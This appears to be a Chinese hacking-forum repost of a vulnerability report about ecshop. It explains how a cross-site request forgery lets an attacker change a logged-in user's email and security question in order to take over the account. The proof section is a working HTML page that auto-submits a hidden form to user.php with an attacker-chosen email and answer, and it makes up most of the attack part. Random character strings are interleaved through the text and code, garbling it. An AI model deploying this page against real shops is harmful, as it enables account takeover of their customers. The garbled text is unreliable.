找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2077|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
7 T  d& u3 B2 [8 h% J1 f) V1 Z4 aecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
/ x9 I+ C) V% g" J0 X. N# h* {# c% R: i$ [. X
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
8 H; {9 C8 @, c2 t6 D4 K1 R
; Q8 ^  I, ]7 ^5 {/ J, a2 S详细说明:
3 |, U/ C1 A* Z" T  x/ |# @利用csrf和xss可以突破官方所说的“障碍”
# d5 t9 b& a4 S  vxss版本已经有人说明, L8 r. W0 c9 d, E" P% v/ A
这里给出csrf版本
3 _( t5 h: Y! q
3 k, O% o1 L6 F) p/ V( I* t漏洞证明:0 u; ]0 o* w& N8 t0 w1 A' z
<html>
4 D4 Z2 E) g; g7 }<body>4 g' h5 f  h$ ?9 ?" J; T6 Y
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">, k5 z$ J% t5 V4 c3 r, ]% E
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) E7 o' P2 H# w  _# H$ D
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
7 W" }6 ]9 t1 y3 P<INPUT TYPE="text" NAME="sel_question" value="ecshop">: t5 f  H2 W) H
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">7 K0 o/ p4 h$ w4 A) L& d( P
</body>
5 k3 s2 R! X5 C* U& o$ o+ F) F1 Y9 ^<script>
, c9 h/ D4 u5 W/ Cdocument.forms[0].submit();
% C: Q0 d& t( S) x" W( e1 S</script>
' v0 \. [9 q8 M& A</html>4 M/ y7 A* H% E6 `# I
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 `$ E, R/ J& l3 A5 d+ i) q
2 |, g1 u3 l" n& p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表